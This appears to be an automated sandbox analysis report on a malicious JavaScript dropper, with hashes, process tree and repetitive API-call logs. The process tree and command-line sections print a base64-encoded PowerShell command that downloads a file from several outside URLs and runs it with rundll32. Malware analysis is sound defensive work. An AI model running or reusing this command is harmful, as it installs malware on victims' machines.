Summary | ZeroBOX

N1799ReleasableNasalwards.js

Generic Malware Antivirus AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6403_us April 5, 2023, 10:21 a.m. April 5, 2023, 10:23 a.m.
Size 173.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 ac6703217fe8901c194ac9f8390bb149
SHA256 083510d0c8bd4983bde6389313bbee78a14fe7bb93498170247d21715d1d7ed3
CRC32 9E39B9FE
ssdeep 3072:a8F8J7B7PgFAxLSG3gwuFano1Vjp2Ke2JDDFoI5G1hsCWA0L1Kh4LobhHeKd:aB7B7IFBG3VuFanCp2Ke2JDDN5G1ZWAn
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\N1799ReleasableNasalwards.js

    1020
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBZADgASQBzAGoAaQBPAFYAVwBRAHMALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAEkAQQB3AHMAZgBHAFkARgBIAHUALABoAHQAdABwAHMAOgAvAC8AYgBsAG8AZwBkAG8AYwBpAHMAbgBlAGkAcgBvAHMALgBjAG8AbQAuAGIAcgAvAEcATwBtAC8AQwBaAFcAZQBOAFkAUgBHAE4AVwAsAGgAdAB0AHAAcwA6AC8ALwBpAG0AbQB1AG4AbwBsAGkAZABlAHIAYQB6AGcAbwB5AG8AcABvAHIAdAB1AG4AaQBkAGEAZAAuAGMAbwBtAC8AeABxAGEANgBDAG4AeQAvADcARABOAHEAOABjAFcAawBFAE8AcgAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQB1AG4AaQBkAGEAZABlAGgAZQBiAHIAbwBtAC4AYwBvAG0ALgBiAHIALwAwAFAAMQA2AC8ASABMAEUAVABRAFIASgAwAGsALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAEwAdQBPAE0AOQB0AFgAYwBpAFkAOQAsAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQB5AG8AdQBuAGcAYQBuAGQAdABoAGUAcgBhAHQAYwBoAGUAdAAuAGMAbwBtAC8ASQB6AHYATwAvAEQASQBZAEIARQB5ADQAMAB2AHYANwAwACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBGAEcAdgA5AEIAbABaAHgAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAGkAbgAgACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZABpAGgAeQBkAHIAaQBjAC4AYgBlAGgAYQB2AGkAbwByAHMAUAByAG8AZgBhAG4AaQB6AGUAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="

      2152

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057fa50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f250
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0057f610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02700000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02801000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02802000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02523000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02524000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02542000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02526000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02543000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02544000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02545000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02546000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02548000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02549000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2152
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBZADgASQBzAGoAaQBPAFYAVwBRAHMALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAEkAQQB3AHMAZgBHAFkARgBIAHUALABoAHQAdABwAHMAOgAvAC8AYgBsAG8AZwBkAG8AYwBpAHMAbgBlAGkAcgBvAHMALgBjAG8AbQAuAGIAcgAvAEcATwBtAC8AQwBaAFcAZQBOAFkAUgBHAE4AVwAsAGgAdAB0AHAAcwA6AC8ALwBpAG0AbQB1AG4AbwBsAGkAZABlAHIAYQB6AGcAbwB5AG8AcABvAHIAdAB1AG4AaQBkAGEAZAAuAGMAbwBtAC8AeABxAGEANgBDAG4AeQAvADcARABOAHEAOABjAFcAawBFAE8AcgAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQB1AG4AaQBkAGEAZABlAGgAZQBiAHIAbwBtAC4AYwBvAG0ALgBiAHIALwAwAFAAMQA2AC8ASABMAEUAVABRAFIASgAwAGsALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAEwAdQBPAE0AOQB0AFgAYwBpAFkAOQAsAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQB5AG8AdQBuAGcAYQBuAGQAdABoAGUAcgBhAHQAYwBoAGUAdAAuAGMAbwBtAC8ASQB6AHYATwAvAEQASQBZAEIARQB5ADQAMAB2AHYANwAwACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBGAEcAdgA5AEIAbABaAHgAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAGkAbgAgACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZABpAGgAeQBkAHIAaQBjAC4AYgBlAGgAYQB2AGkAbwByAHMAUAByAG8AZgBhAG4AaQB6AGUAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAa